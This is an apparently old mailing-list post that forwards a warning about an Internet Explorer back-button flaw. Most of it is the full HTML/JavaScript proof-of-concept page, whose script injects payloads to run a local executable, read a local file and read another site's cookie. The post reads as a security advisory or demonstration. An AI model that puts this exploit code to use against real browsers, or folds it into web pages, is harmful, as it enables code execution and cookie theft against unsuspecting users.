My network admin sent me this today:
Yep, the back button...that innocuous little button you hit when you get 
to a page that isn't available.  Don't use it.  There's an exploit that 
allows someone to take advantage of the way IE loads error pages.  Once 
you get on the error page, IE thinks it's 'safe'.  Unfortunately, it's not 
difficult to link JavaScript to the back button on the browser and 
execute code.  Since IE thinks it is 'safe', it runs the code.

Here's the source for an example page:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><HEAD>

<META http-equiv=Content-Type content="text/html; charset=unicode">
<META content="MSHTML 6.00.2715.400" name=GENERATOR></HEAD>
<BODY>
<h1>Press link and then the backbutton to trigger script.</h1>
<A href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<A href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<A href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<A href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
   s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
   s+= 'CODEBASE='+file+'></OBJECT>';
   backBug(badUrl,s);
}
function readFile(file){
   s = '<iframe name=i src='+file+' style=display:none onload=';
   s+= 'alert(i.document.body.innerText)></iframe>';
   backBug(badUrl,s);
}

function readCookie(url){
   s = '<script>alert(document.cookie);close();<"+"/script>';
   backBug(url,s);
}

function backBug(url,payload){
   len = history.length;
   page = document.location;
   s = "javascript:if (history.length!="+len+") {";
   s+= "open('javascript:document.write(\""+payload+"\")')";
   s+= ";history.back();} else '<script>location=\""+url
   s+= "\";document.title=\""+page+"\";<"+"/script>';";
   location = s;
}
</script>
</BODY>
</html>

Hatton

Archives: http://www.mail-archive.com/[email protected]/